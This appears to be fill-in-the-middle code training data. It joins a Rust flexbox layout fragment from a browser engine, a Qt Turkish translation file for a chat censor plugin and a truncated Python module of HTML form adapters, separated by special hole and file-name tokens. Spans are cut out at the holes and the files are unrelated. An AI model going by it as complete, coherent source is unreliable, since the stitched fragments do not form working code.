        .map(|line| {
            // FIXME: “Align all flex lines per `align-content`.”
            // For now we hard-code the behavior of `align-content: flex-start`.
            let cross_start = cross_start_position_cursor;
            let cross_end = cross_start + line.cross_size;
            cross_start_position_cursor = cross_end;
            cross_start
        })
        .collect::<Vec<_>>();
    let content_block_size = match flex_context.flex_axis {
        FlexAxis::Row => {
            // `container_main_size` ends up unused here but in this case that’s fine
            // since it was already exactly the one decided by the outer formatting context.
            container_cross_size
        },
        FlexAxis::Column => {
            // FIXME: `container_cross_size` ends up unused here, which is a bug.
            // It is meant to be the used inline-size, but the parent formatting context
            // has already decided a possibly-different used inline-size.
            // The spec is missing something to resolve this conflict:
            // https://github.com/w3c/csswg-drafts/issues/5190
            // And we’ll need to change the signature of `IndependentFormattingContext::layout`
            // to allow the inner formatting context to “negotiate” a used inline-size
            // with the outer one somehow.
            container_main_size
        },
    };
    // Note: `flat_map` already yields an iterator; the previous `.into_iter()`
    // call on it was a no-op and has been removed.
    let fragments = flex_lines
        .into_iter()
        .zip(line_cross_start_positions)
        .flat_map(move |(mut line, line_cross_start_position)| {
            // Convert each line’s flex-relative cross-start position into a
            // flow-relative offset, accounting for `flex-wrap: wrap-reverse`.
            let flow_relative_line_position = match (flex_axis, flex_wrap_reverse) {
                (FlexAxis::Row, false) => Vec2 {
                    block: line_cross_start_position,
                    inline: Length::zero(),
                },
                (FlexAxis::Row, true) => Vec2 {
                    block: container_cross_size - line_cross_start_position - line.cross_size,
                    inline: Length::zero(),
                },
                (FlexAxis::Column, false) => Vec2 {
                    block: Length::zero(),
                    inline: line_cross_start_position,
                },
                (FlexAxis::Column, true) => Vec2 {
                    block: Length::zero(),
                    inline: container_cross_size - line_cross_start_position - line.cross_size,
                },
            };
            for fragment in &mut line.item_fragments {
                fragment.content_rect.start_corner += &flow_relative_line_position
            }
            line.item_fragments
        });
    (fragments, content_block_size)
}
impl<'a> FlexItem<'a> {
    /// Gather the style-derived inputs for one flex item (sizes,
    /// padding/border/margin, alignment, flex base size), converted into
    /// flex-relative (main/cross) axes.
    fn new(
        flex_context: &FlexContext,
        box_: &'a mut IndependentFormattingContext,
        tree_rank: usize,
    ) -> Self {
        let containing_block = flex_context.containing_block;
        let box_style = box_.style();
        // https://drafts.csswg.org/css-writing-modes/#orthogonal-flows
        assert_eq!(
            containing_block.style.writing_mode, box_style.writing_mode,
            "Mixed writing modes are not supported yet"
        );
        let container_is_horizontal = containing_block.style.writing_mode.is_horizontal();
        let item_is_horizontal = box_style.writing_mode.is_horizontal();
        let item_is_orthogonal = item_is_horizontal != container_is_horizontal;
        let container_is_row = flex_context.flex_axis == FlexAxis::Row;
        // In a row container the cross axis is the item’s block axis (and
        // vice-versa), flipped for orthogonal items — though the assert above
        // currently excludes orthogonal items.
        let cross_axis_is_item_block_axis = container_is_row ^ item_is_orthogonal;
        let pbm = box_style.padding_border_margin(containing_block);
        let content_box_size = box_style.content_box_size(containing_block, &pbm);
        let max_size = box_style.content_max_box_size(containing_block, &pbm);
        let min_size = box_style.content_min_box_size(containing_block, &pbm);
        // https://drafts.csswg.org/css-flexbox/#min-size-auto
        let min_size = min_size.auto_is(|| automatic_min_size(box_));
        let margin_auto_is_zero = pbm.margin.auto_is(Length::zero);
        // Convert everything into flex-relative axes.
        let content_box_size = flex_context.vec2_to_flex_relative(content_box_size);
        let content_max_size = flex_context.vec2_to_flex_relative(max_size);
        let content_min_size = flex_context.vec2_to_flex_relative(min_size);
        let margin_auto_is_zero = flex_context.sides_to_flex_relative(margin_auto_is_zero);
        let margin = flex_context.sides_to_flex_relative(pbm.margin);
        let padding = flex_context.sides_to_flex_relative(pbm.padding);
        let border = flex_context.sides_to_flex_relative(pbm.border);
        let padding_border = padding.sum_by_axis() + border.sum_by_axis();
        let pbm_auto_is_zero = padding_border + margin_auto_is_zero.sum_by_axis();
        let align_self = flex_context.align_for(&box_style.clone_align_self());
        let flex_base_size = flex_base_size(
            flex_context,
            box_,
            cross_axis_is_item_block_axis,
            content_box_size,
            padding_border,
        );
        // https://drafts.csswg.org/css-flexbox/#algo-main-item
        let hypothetical_main_size =
            flex_base_size.clamp_between_extremums(content_min_size.main, content_max_size.main);
        Self {
            box_,
            tree_rank,
            content_box_size,
            content_min_size,
            content_max_size,
            padding,
            border,
            margin,
            pbm_auto_is_zero,
            flex_base_size,
            hypothetical_main_size,
            align_self,
        }
    }
}
/// Resolve an `auto` min main size for a flex item.
/// https://drafts.csswg.org/css-flexbox/#min-size-auto
fn automatic_min_size(_box: &IndependentFormattingContext) -> Length {
    // FIXME: implement the actual algorithm
    Length::zero() // Give an incorrect value rather than panicking
}
/// Compute the flex base size of one item, resolving its `flex-basis` first.
/// `content_box_size` and `padding_border_sums` are in flex-relative axes.
/// https://drafts.csswg.org/css-flexbox/#algo-main-item
fn flex_base_size(
    flex_context: &FlexContext,
    flex_item: &mut IndependentFormattingContext,
    cross_axis_is_item_block_axis: bool,
    content_box_size: FlexRelativeVec2<LengthOrAuto>,
    padding_border_sums: FlexRelativeVec2<Length>,
) -> Length {
    // First, resolve the used value of `flex-basis`.
    let used_flex_basis = match &flex_item.style().get_position().flex_basis {
        FlexBasis::Content => FlexBasis::Content,
        FlexBasis::Size(Size::LengthPercentage(length_percentage)) => {
            let apply_box_sizing = |length: Length| {
                match flex_item.style().get_position().box_sizing {
                    BoxSizing::ContentBox => length,
                    BoxSizing::BorderBox => {
                        // This may make `length` negative,
                        // but it will be clamped in the hypothetical main size
                        length - padding_border_sums.main
                    },
                }
            };
            // “For example, percentage values of flex-basis are resolved
            // against the flex item’s containing block (i.e. its flex container);”
            match flex_context.container_definite_inner_size.main {
                Some(container_definite_main_size) => {
                    let length = length_percentage
                        .0
                        .percentage_relative_to(container_definite_main_size);
                    FlexBasis::Size(apply_box_sizing(length))
                },
                None => {
                    if let Some(length) = length_percentage.0.to_length() {
                        FlexBasis::Size(apply_box_sizing(length))
                    } else {
                        // “and if that containing block’s size is indefinite,
                        // the used value for `flex-basis` is `content`.”
                        // https://drafts.csswg.org/css-flexbox/#flex-basis-property
                        FlexBasis::Content
                    }
                },
            }
        },
        FlexBasis::Size(Size::Auto) => {
            // “When specified on a flex item, the `auto` keyword retrieves
            // the value of the main size property as the used `flex-basis`.”
            match content_box_size.main {
                LengthOrAuto::LengthPercentage(length) => FlexBasis::Size(length),
                // “If that value is itself `auto`, then the used value is `content`.”
                LengthOrAuto::Auto => FlexBasis::Content,
            }
        },
    };
    // NOTE: at this point the flex basis is either `content` or a definite length.
    // However when we add support for additional values for `width` and `height`
    // from https://drafts.csswg.org/css-sizing/#preferred-size-properties,
    // it could have those values too.
    match used_flex_basis {
        FlexBasis::Size(length) => {
            // Case A: definite flex basis
            length
        },
        FlexBasis::Content => {
            // “treating a value of content as max-content.”
            if cross_axis_is_item_block_axis {
                // The main axis is the inline axis
                flex_item
                    .inline_content_sizes(flex_context.layout_context)
                    .max_content
            } else {
                // FIXME: block-axis content sizing requires another pass
                // of "full" layout
                todo!()
                // Note: this panic shouldn’t happen since the start of `FlexContainer::layout`
                // forces `FlexAxis::Row` and the `writing-mode` property is disabled.
            }
        },
    }
}
// “Collect flex items into flex lines”
// https://drafts.csswg.org/css-flexbox/#algo-line-break
//
// Calls `each` once per line (with the line’s items and the sum of their
// outer hypothetical main sizes) and returns the results in order.
fn collect_flex_lines<'items, LineResult>(
    flex_context: &mut FlexContext,
    container_main_size: Length,
    mut items: &'items mut [FlexItem<'items>],
    mut each: impl FnMut(&mut FlexContext, FlexLine<'items>) -> LineResult,
) -> Vec<LineResult> {
    if flex_context.container_is_single_line {
        // `flex-wrap: nowrap`: every item goes on the single line.
        let line = FlexLine {
            outer_hypothetical_main_sizes_sum: items
                .iter()
                .map(|item| item.hypothetical_main_size + item.pbm_auto_is_zero.main)
                .sum(),
            items,
        };
        return vec![each(flex_context, line)];
    } else {
        let mut lines = Vec::new();
        let mut line_size_so_far = Length::zero();
        let mut line_so_far_is_empty = true;
        let mut index = 0;
        while let Some(item) = items.get(index) {
            let item_size = item.hypothetical_main_size + item.pbm_auto_is_zero.main;
            let line_size_would_be = line_size_so_far + item_size;
            let item_fits = line_size_would_be <= container_main_size;
            // An over-large item still goes on a line of its own
            // rather than leaving an empty line.
            if item_fits || line_so_far_is_empty {
                line_size_so_far = line_size_would_be;
                line_so_far_is_empty = false;
                index += 1;
            } else {
                // We found something that doesn’t fit. This line ends *before* this item.
                let (line_items, rest) = items.split_at_mut(index);
                let line = FlexLine {
                    items: line_items,
                    outer_hypothetical_main_sizes_sum: line_size_so_far,
                };
                items = rest;
                lines.push(each(flex_context, line));
                // The next line has this item.
                line_size_so_far = item_size;
                index = 1;
            }
        }
        // The last line is added even without finding an item that doesn’t fit
        let line = FlexLine {
            items,
            outer_hypothetical_main_sizes_sum: line_size_so_far,
        };
        lines.push(each(flex_context, line));
        lines
    }
}
impl FlexLine<'_> {
    /// Lay out this line’s items: resolve main sizes, lay out each item to get
    /// its cross size, resolve auto margins, align along both axes, and
    /// assemble one `BoxFragment` per item.
    fn layout(
        &mut self,
        flex_context: &mut FlexContext,
        container_main_size: Length,
    ) -> FlexLineLayoutResult {
        let (item_used_main_sizes, remaining_free_space) =
            self.resolve_flexible_lengths(container_main_size);
        // https://drafts.csswg.org/css-flexbox/#algo-cross-item
        let item_layout_results = self
            .items
            .iter_mut()
            .zip(&item_used_main_sizes)
            .map(|(item, &used_main_size)| item.layout(used_main_size, flex_context, None))
            .collect::<Vec<_>>();
        // https://drafts.csswg.org/css-flexbox/#algo-cross-line
        let line_cross_size = self.cross_size(&item_layout_results, &flex_context);
        let line_size = FlexRelativeVec2 {
            main: container_main_size,
            cross: line_cross_size,
        };
        // FIXME: Handle `align-content: stretch`
        // https://drafts.csswg.org/css-flexbox/#algo-line-stretch
        // FIXME: Collapse `visibility: collapse` items
        // This involves “restart layout from the beginning” with a modified second round,
        // which will make structuring the code… interesting.
        // https://drafts.csswg.org/css-flexbox/#algo-visibility
        // Determine the used cross size of each flex item
        // https://drafts.csswg.org/css-flexbox/#algo-stretch
        let (item_used_cross_sizes, item_fragments): (Vec<_>, Vec<_>) = self
            .items
            .iter_mut()
            .zip(item_layout_results)
            .zip(&item_used_main_sizes)
            .map(|((item, mut item_result), &used_main_size)| {
                let has_stretch = item.align_self == AlignItems::Stretch;
                let cross_size = if has_stretch &&
                    item.content_box_size.cross.is_auto() &&
                    !(item.margin.cross_start.is_auto() || item.margin.cross_end.is_auto())
                {
                    (line_cross_size - item.pbm_auto_is_zero.cross).clamp_between_extremums(
                        item.content_min_size.cross,
                        item.content_max_size.cross,
                    )
                } else {
                    item_result.hypothetical_cross_size
                };
                if has_stretch {
                    // “If the flex item has `align-self: stretch`, redo layout for its contents,
                    // treating this used size as its definite cross size
                    // so that percentage-sized children can be resolved.”
                    item_result = item.layout(used_main_size, flex_context, Some(cross_size));
                }
                // Only the final layout pass’s hoisted boxes are kept.
                flex_context
                    .positioning_context
                    .append(item_result.positioning_context);
                (cross_size, item_result.fragments)
            })
            .unzip();
        // Distribute any remaining free space
        // https://drafts.csswg.org/css-flexbox/#algo-main-align
        let item_main_margins = self.resolve_auto_main_margins(remaining_free_space);
        // FIXME: “Align the items along the main-axis per justify-content.”
        // For now we hard-code `justify-content` to `flex-start`.
        // https://drafts.csswg.org/css-flexbox/#algo-cross-margins
        let item_cross_margins = self.items.iter().zip(&item_used_cross_sizes).map(
            |(item, &item_cross_content_size)| {
                item.resolve_auto_cross_margins(
                    &flex_context,
                    line_cross_size,
                    item_cross_content_size,
                )
            },
        );
        let item_margins = item_main_margins
            .zip(item_cross_margins)
            .map(
                |((main_start, main_end), (cross_start, cross_end))| FlexRelativeSides {
                    main_start,
                    main_end,
                    cross_start,
                    cross_end,
                },
            )
            .collect::<Vec<_>>();
        // https://drafts.csswg.org/css-flexbox/#algo-main-align
        let items_content_main_start_positions =
            self.align_along_main_axis(&item_used_main_sizes, &item_margins);
        // https://drafts.csswg.org/css-flexbox/#algo-cross-align
        let item_content_cross_start_posititons = self
            .items
            .iter()
            .zip(&item_margins)
            .zip(&item_used_cross_sizes)
            .map(|((item, margin), size)| {
                item.align_along_cross_axis(margin, size, line_cross_size)
            });
        // Assemble each item’s size, position, and margins into a `BoxFragment`,
        // converting flex-relative geometry back into flow-relative geometry.
        let item_fragments = self
            .items
            .iter()
            .zip(item_fragments)
            .zip(
                item_used_main_sizes
                    .iter()
                    .zip(&item_used_cross_sizes)
                    .map(|(&main, &cross)| FlexRelativeVec2 { main, cross })
                    .zip(
                        items_content_main_start_positions
                            .zip(item_content_cross_start_posititons)
                            .map(|(main, cross)| FlexRelativeVec2 { main, cross }),
                    )
                    .map(|(size, start_corner)| FlexRelativeRect { size, start_corner }),
            )
            .zip(&item_margins)
            .map(|(((item, fragments), content_rect), margin)| {
                let content_rect = flex_context.rect_to_flow_relative(line_size, content_rect);
                let margin = flex_context.sides_to_flow_relative(*margin);
                let collapsed_margin = CollapsedBlockMargins::from_margin(&margin);
                BoxFragment::new(
                    item.box_.tag(),
                    item.box_.style().clone(),
                    fragments,
                    content_rect,
                    flex_context.sides_to_flow_relative(item.padding),
                    flex_context.sides_to_flow_relative(item.border),
                    margin,
                    collapsed_margin,
                )
            })
            .collect();
        FlexLineLayoutResult {
            cross_size: line_cross_size,
            item_fragments,
        }
    }
    /// Return the *main size* of each item, and the line’s remaining free space
    /// https://drafts.csswg.org/css-flexbox/#resolve-flexible-lengths
    fn resolve_flexible_lengths(&self, container_main_size: Length) -> (Vec<Length>, Length) {
        let mut frozen = vec![false; self.items.len()];
        let mut target_main_sizes_vec = self
            .items
            .iter()
            .map(|item| item.flex_base_size)
            .collect::<Vec<_>>();
        // Using `Cell`s reconciles mutability with multiple borrows in closures
        let target_main_sizes = Cell::from_mut(&mut *target_main_sizes_vec).as_slice_of_cells();
        let frozen = Cell::from_mut(&mut *frozen).as_slice_of_cells();
        let frozen_count = Cell::new(0);
        // Growing (positive free space) uses `flex-grow`; shrinking uses `flex-shrink`.
        let grow = self.outer_hypothetical_main_sizes_sum < container_main_size;
        let flex_factor = |item: &FlexItem| {
            let position_style = item.box_.style().get_position();
            if grow {
                position_style.flex_grow.0
            } else {
                position_style.flex_shrink.0
            }
        };
        let items = || self.items.iter().zip(target_main_sizes).zip(frozen);
        // “Size inflexible items”
        for ((item, target_main_size), frozen) in items() {
            let is_inflexible = flex_factor(item) == 0. ||
                if grow {
                    item.flex_base_size > item.hypothetical_main_size
                } else {
                    item.flex_base_size < item.hypothetical_main_size
                };
            if is_inflexible {
                frozen_count.set(frozen_count.get() + 1);
                frozen.set(true);
                target_main_size.set(item.hypothetical_main_size);
            }
        }
        let check_for_flexible_items = || frozen_count.get() < self.items.len();
        let free_space = || {
            container_main_size -
                items()
                    .map(|((item, target_main_size), frozen)| {
                        item.pbm_auto_is_zero.main +
                            if frozen.get() {
                                target_main_size.get()
                            } else {
                                item.flex_base_size
                            }
                    })
                    .sum()
        };
        // https://drafts.csswg.org/css-flexbox/#initial-free-space
        let initial_free_space = free_space();
        let unfrozen_items = || {
            items().filter_map(|(item_and_target_main_size, frozen)| {
                if !frozen.get() {
                    Some(item_and_target_main_size)
                } else {
                    None
                }
            })
        };
        loop {
            // https://drafts.csswg.org/css-flexbox/#remaining-free-space
            let mut remaining_free_space = free_space();
            if !check_for_flexible_items() {
                return (target_main_sizes_vec, remaining_free_space);
            }
            let unfrozen_items_flex_factor_sum: f32 =
                unfrozen_items().map(|(item, _)| flex_factor(item)).sum();
            // FIXME: I (Simon) transcribed the spec but I don’t yet understand why this algorithm
            if unfrozen_items_flex_factor_sum < 1. {
                let multiplied = initial_free_space * unfrozen_items_flex_factor_sum;
                if multiplied.abs() < remaining_free_space.abs() {
                    remaining_free_space = multiplied
                }
            }
            // “Distribute free space proportional to the flex factors.”
            // FIXME: is it a problem if floating point precision errors accumulate
            // and we get not-quite-zero remaining free space when we should get zero here?
            if remaining_free_space != Length::zero() {
                if grow {
                    for (item, target_main_size) in unfrozen_items() {
                        let grow_factor = item.box_.style().get_position().flex_grow.0;
                        let ratio = grow_factor / unfrozen_items_flex_factor_sum;
                        target_main_size.set(item.flex_base_size + remaining_free_space * ratio);
                    }
                } else {
                    // https://drafts.csswg.org/css-flexbox/#scaled-flex-shrink-factor
                    let scaled_shrink_factor = |item: &FlexItem| {
                        let shrink_factor = item.box_.style().get_position().flex_shrink.0;
                        item.flex_base_size * shrink_factor
                    };
                    let scaled_shrink_factors_sum: Length = unfrozen_items()
                        .map(|(item, _)| scaled_shrink_factor(item))
                        .sum();
                    for (item, target_main_size) in unfrozen_items() {
                        let ratio = scaled_shrink_factor(item) / scaled_shrink_factors_sum;
                        target_main_size
                            .set(item.flex_base_size - remaining_free_space.abs() * ratio);
                    }
                }
            }
            // “Fix min/max violations.”
            let violation = |(item, target_main_size): (&FlexItem, &Cell<Length>)| {
                let size = target_main_size.get();
                let clamped = size.clamp_between_extremums(
                    item.content_min_size.main,
                    item.content_max_size.main,
                );
                clamped - size
            };
            // “Freeze over-flexed items.”
            let total_violation: Length = unfrozen_items().map(violation).sum();
            if total_violation == Length::zero() {
                // “Freeze all items.”
                // Return instead, as that’s what the next loop iteration would do.
                let remaining_free_space =
                    container_main_size - target_main_sizes_vec.iter().cloned().sum();
                return (target_main_sizes_vec, remaining_free_space);
            } else if total_violation > Length::zero() {
                // “Freeze all the items with min violations.”
                // “If the item’s target main size was made larger by [clamping],
                // it’s a min violation.”
                for (item_and_target_main_size, frozen) in items() {
                    if violation(item_and_target_main_size) > Length::zero() {
                        frozen_count.set(frozen_count.get() + 1);
                        frozen.set(true);
                    }
                }
            } else {
                // Negative total violation
                // “Freeze all the items with max violations.”
                // “If the item’s target main size was made smaller by [clamping],
                // it’s a max violation.”
                for (item_and_target_main_size, frozen) in items() {
                    if violation(item_and_target_main_size) < Length::zero() {
                        frozen_count.set(frozen_count.get() + 1);
                        frozen.set(true);
                    }
                }
            }
        }
    }
}
impl<'a> FlexItem<'a> {
    // Return the hypothetical cross size together with laid out contents of the fragment.
    // https://drafts.csswg.org/css-flexbox/#algo-cross-item
    // “performing layout as if it were an in-flow block-level box
    // with the used main size and the given available space, treating `auto` as `fit-content`.”
    //
    // `used_cross_size_override` is passed for the `align-self: stretch` re-layout,
    // where the stretched cross size acts as the definite block size.
    fn layout(
        &mut self,
        used_main_size: Length,
        flex_context: &mut FlexContext,
        used_cross_size_override: Option<Length>,
    ) -> FlexItemLayoutResult {
        // Hoisted boxes are collected in a separate context so a discarded
        // layout pass does not leak them into the container’s context.
        let mut positioning_context = PositioningContext::new_for_rayon(
            flex_context
                .positioning_context
                .collects_for_nearest_positioned_ancestor(),
        );
        match flex_context.flex_axis {
            FlexAxis::Row => {
                // The main axis is the container’s inline axis
                // https://drafts.csswg.org/css-writing-modes/#orthogonal-flows
                assert_eq!(
                    flex_context.containing_block.style.writing_mode,
                    self.box_.style().writing_mode,
                    "Mixed writing modes are not supported yet"
                );
                // … and also the item’s inline axis.
                match self.box_ {
                    IndependentFormattingContext::Replaced(replaced) => {
                        // Replaced items size like inline-level replaced elements.
                        let pbm = replaced
                            .style
                            .padding_border_margin(flex_context.containing_block);
                        let size = replaced.contents.used_size_as_if_inline_element(
                            flex_context.containing_block,
                            &replaced.style,
                            &pbm,
                        );
                        let cross_size = flex_context.vec2_to_flex_relative(size.clone()).cross;
                        let fragments = replaced.contents.make_fragments(&replaced.style, size);
                        FlexItemLayoutResult {
                            hypothetical_cross_size: cross_size,
                            fragments,
                            positioning_context,
                        }
                    },
                    IndependentFormattingContext::NonReplaced(non_replaced) => {
                        let block_size = match used_cross_size_override {
                            Some(s) => LengthOrAuto::LengthPercentage(s),
                            None => self.content_box_size.cross,
                        };
                        // Lay out the item’s contents with the used main size
                        // as the inline size of their containing block.
                        let item_as_containing_block = ContainingBlock {
                            inline_size: used_main_size,
                            block_size,
                            style: &non_replaced.style,
                        };
                        let IndependentLayout {
                            fragments,
                            content_block_size,
                        } = non_replaced.layout(
                            flex_context.layout_context,
                            &mut positioning_context,
                            &item_as_containing_block,
                            self.tree_rank,
                        );
                        let hypothetical_cross_size = self
                            .content_box_size
                            .cross
                            .auto_is(|| content_block_size)
                            .clamp_between_extremums(
                                self.content_min_size.cross,
                                self.content_max_size.cross,
                            );
                        FlexItemLayoutResult {
                            hypothetical_cross_size,
                            fragments,
                            positioning_context,
                        }
                    },
                }
            },
            FlexAxis::Column => {
                todo!()
                // Note: this panic shouldn’t happen since the start of `FlexContainer::layout`
                // forces `FlexAxis::Row`.
            },
        }
    }
}
impl<'items> FlexLine<'items> {
    /// https://drafts.csswg.org/css-flexbox/#algo-cross-line
    fn cross_size(
        &self,
        item_layout_results: &[FlexItemLayoutResult],
        flex_context: &FlexContext,
    ) -> Length {
        // A single-line container with a definite cross size gives the line
        // that size directly.
        if flex_context.container_is_single_line {
            if let Some(size) = flex_context.container_definite_inner_size.cross {
                return size;
            }
        }
        let outer_hypothetical_cross_sizes =
            item_layout_results
                .iter()
                .zip(&*self.items)
                .map(|(item_result, item)| {
                    item_result.hypothetical_cross_size + item.pbm_auto_is_zero.cross
                });
        // FIXME: add support for `align-self: baseline`
        // and computing the baseline of flex items.
        // https://drafts.csswg.org/css-flexbox/#baseline-participation
        let largest = outer_hypothetical_cross_sizes.fold(Length::zero(), Length::max);
        if flex_context.container_is_single_line {
            largest.clamp_between_extremums(
                flex_context.container_min_cross_size,
                flex_context.container_max_cross_size,
            )
        } else {
            largest
        }
    }
    // Return the main-start and main-end margin of each item in the line,
    // with `auto` values resolved.
    // Positive remaining free space is divided equally among the `auto` margins.
    fn resolve_auto_main_margins(
        &self,
        remaining_free_space: Length,
    ) -> impl Iterator<Item = (Length, Length)> + '_ {
        let each_auto_margin = if remaining_free_space > Length::zero() {
            let auto_margins_count = self
                .items
                .iter()
                .map(|item| {
                    item.margin.main_start.is_auto() as u32 + item.margin.main_end.is_auto() as u32
                })
                .sum::<u32>();
            if auto_margins_count > 0 {
                remaining_free_space / auto_margins_count as f32
            } else {
                Length::zero()
            }
        } else {
            Length::zero()
        };
        self.items.iter().map(move |item| {
            (
                item.margin.main_start.auto_is(|| each_auto_margin),
                item.margin.main_end.auto_is(|| each_auto_margin),
            )
        })
    }
    /// Return the coordinate of the main-start side of the content area of each item
    fn align_along_main_axis<'a>(
        &'a self,
        item_used_main_sizes: &'a [Length],
        item_margins: &'a [FlexRelativeSides<Length>],
    ) -> impl Iterator<Item = Length> + 'a {
        // “Align the items along the main-axis”
        // FIXME: “per justify-content.”
        // For now we hard-code the behavior for `justify-content: flex-start`.
        let mut main_position_cursor = Length::zero();
        self.items
            .iter()
            .zip(item_used_main_sizes)
            .zip(item_margins)
            .map(move |((item, &main_content_size), margin)| {
                // The content starts after the main-start margin, border, and
                // padding; the cursor then advances past the rest of the outer size.
                main_position_cursor +=
                    margin.main_start + item.border.main_start + item.padding.main_start;
                let content_main_start_position = main_position_cursor;
                main_position_cursor += main_content_size +
                    item.padding.main_end +
                    item.border.main_end +
                    margin.main_end;
                content_main_start_position
            })
    }
}
impl FlexItem<'_> {
    /// Return the cross-start and cross-end margin, with `auto` values resolved.
    /// https://drafts.csswg.org/css-flexbox/#algo-cross-margins
    fn resolve_auto_cross_margins(
        &self,
        flex_context: &FlexContext,
        line_cross_size: Length,
        item_cross_content_size: Length,
    ) -> (Length, Length) {
        let auto_count = match (self.margin.cross_start, self.margin.cross_end) {
            // Neither margin is `auto`: nothing to resolve.
            (LengthOrAuto::LengthPercentage(start), LengthOrAuto::LengthPercentage(end)) => {
                return (start, end);
            },
            (LengthOrAuto::Auto, LengthOrAuto::Auto) => 2.,
            _ => 1.,
        };
        let outer_size = self.pbm_auto_is_zero.cross + item_cross_content_size;
        let available = line_cross_size - outer_size;
        let start;
        let end;
        if available > Length::zero() {
            // Positive free space is split equally among the `auto` margins.
            let each_auto_margin = available / auto_count;
            start = self.margin.cross_start.auto_is(|| each_auto_margin);
            end = self.margin.cross_end.auto_is(|| each_auto_margin);
        } else {
            // “the block-start or inline-start margin (whichever is in the cross axis)”
            // This margin is the cross-end one iff `flex-wrap` is `wrap-reverse`,
            // cross-start otherwise.
            // We know this because:
            // https://drafts.csswg.org/css-flexbox/#flex-wrap-property
            // “For the values that are not wrap-reverse,
            // the cross-start direction is equivalent to
            // either the inline-start or block-start direction of the current writing mode
            // (whichever is in the cross axis)
            // and the cross-end direction is the opposite direction of cross-start.
            // When flex-wrap is wrap-reverse,
            // the cross-start and cross-end directions are swapped.”
            let flex_wrap = flex_context.containing_block.style.get_position().flex_wrap;
            let flex_wrap_reverse = match flex_wrap {
                FlexWrap::Nowrap | FlexWrap::Wrap => false,
                FlexWrap::WrapReverse => true,
            };
            // “if the block-start or inline-start margin (whichever is in the cross axis) is auto,
            // set it to zero. Set the opposite margin so that the outer cross size of the item
            // equals the cross size of its flex line.”
            if flex_wrap_reverse {
                start = self.margin.cross_start.auto_is(|| available);
                end = self.margin.cross_end.auto_is(Length::zero);
            } else {
                start = self.margin.cross_start.auto_is(Length::zero);
                end = self.margin.cross_end.auto_is(|| available);
            }
        }
        (start, end)
    }
/// Return the coordinate of the cross-start side of the content area
fn align_along_cross_axis(
&self,
margin: &FlexRelativeSides<Length>,
content_size: &Length,
line_cross_size: Length,
) -> Length {
let outer_cross_start =
if self.margin.cross_start.is_auto() || self.margin.cross_end.is_auto() {
Length::zero()
} else {
match self.align_self {
AlignItems::Stretch | AlignItems::FlexStart => Length::zero(),
AlignItems::FlexEnd => {
let margin_box_cross = *content_size + self.pbm_auto_is_zero.cross;
line_cross_size - margin_box_cross
},
AlignItems::Center => {
let margin_box_cross = *content_size + self.pbm_auto_is_zero.cross;
(line_cross_size - margin_box_cross) / 2.
},
// FIXME: handle baseline alignment
AlignItems::Baseline => Length::zero(),
}
};
outer_cross_start + margin.cross_start + self.border.cross_start + self.padding.cross_start
}
}<|fim▁end|> | // FIXME: implement cases B, C, D.
// Case E: everything else |
<|file_name|>cenzor_tr_TR.ts<|end_file_name|><|fim▁begin|><?xml version="1.0" ?><!DOCTYPE TS><TS language="tr_TR" version="2.1">
<context>
<name>@default</name>
<message>
<source>Chat</source>
<translation type="unfinished"/>
</message>
<message>
<source>Cenzor</source>
<translation type="unfinished"/>
</message>
<message>
<source>General</source>
<translation type="unfinished"/>
</message>
<message>
<source>Enable cenzor</source>
<translation type="unfinished"/>
</message>
<message>
<source>Admonition</source>
<translation type="unfinished"/>
</message>
<message>
<source>Swearwords</source>
<translation type="unfinished"/>
</message>
<message>
<source>Exclusions</source>
<translation type="unfinished"/>
</message>
<message>
<source>Message was cenzored</source>
<translation type="unfinished"/>
</message>
</context>
<context>
<name>CenzorNotificationService</name>
<message><|fim▁hole|> <source>Cenzor</source>
<translation type="unfinished"/>
</message>
<message>
<source>Message was cenzored</source>
<translation type="unfinished"/>
</message>
<message>
<source>Your interlocutor used obscene word and became admonished</source>
<translation type="unfinished"/>
</message>
</context>
<context>
<name>ListEditWidget</name>
<message>
<source>Add</source>
<translation type="unfinished"/>
</message>
<message>
<source>Change</source>
<translation type="unfinished"/>
</message>
<message>
<source>Delete</source>
<translation type="unfinished"/>
</message>
</context>
</TS><|fim▁end|> | |
<|file_name|>_adapters.py<|end_file_name|><|fim▁begin|># -*- coding: ascii -*-
r"""
:Copyright:
Copyright 2007 - 2015
Andr\xe9 Malo or his licensors, as applicable
:License:
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
=====================
HTML forms reloaded
=====================
Form helper classes.
"""
if __doc__:
# pylint: disable = redefined-builtin
__doc__ = __doc__.encode('ascii').decode('unicode_escape')
__author__ = r"Andr\xe9 Malo".encode('ascii').decode('unicode_escape')
__docformat__ = "restructuredtext en"
__all__ = [
'DictParameterAdapter', 'ListDictParameterAdapter',
'MultiDictParameterAdapter', 'NullParameterAdapter',
]
from ._interfaces import ParameterAdapterInterface
class DictParameterAdapter(object):
"""
HTMLForm parameter adapter from a simple dict
:IVariables:
`param` : ``dict``
Parameters
"""
__implements__ = [ParameterAdapterInterface]
def __init__(self, param):
"""
Initialization
:Parameters:
`param` : ``dict``
Parameters
"""
self.param = param
def getfirst(self, name, default=None):
""" :See: ``tdi.tools.htmlform.ParameterAdapterInterface`` """
return self.param.get(name, default)
def getlist(self, name):
""" :See: ``tdi.tools.htmlform.ParameterAdapterInterface`` """
if name in self.param:
return [self.param[name]]
return []
class ListDictParameterAdapter(object):
"""
HTMLForm parameter adapter from a dict of sequences
:IVariables:
`param` : dict of sequences
Parameters
"""
__implements__ = [ParameterAdapterInterface]
def __init__(self, param):
"""
Initialization
:Parameters:
`param` : dict of sequences
Parameters. Empty sequences act as if the key was not present.
Otherwise ``getfirst`` will return the first element and
``getlist`` will return a shallow copy of the sequence as a
``list``.
"""
self.param = param
def getfirst(self, name, default=None):
""" :See: ``tdi.tools.htmlform.ParameterAdapterInterface`` """
try:
result = self.param[name]
except KeyError:
pass
else:
if result:
return result[0]
return default
def getlist(self, name):
""" :See: ``tdi.tools.htmlform.ParameterAdapterInterface`` """
try:
result = self.param[name]
except KeyError:
pass
else:
return list(result)
return []
class MultiDictParameterAdapter(object):
"""
HTMLForm parameter adapter from a multidict (like paste provides)
:IVariables:
`param` : multidict
Parameters
"""
__implements__ = [ParameterAdapterInterface]
def __init__(self, param):
"""
Initialization
:Parameters:
`param` : multidict
Parameters. The object is expected to provide a getall() method
"""
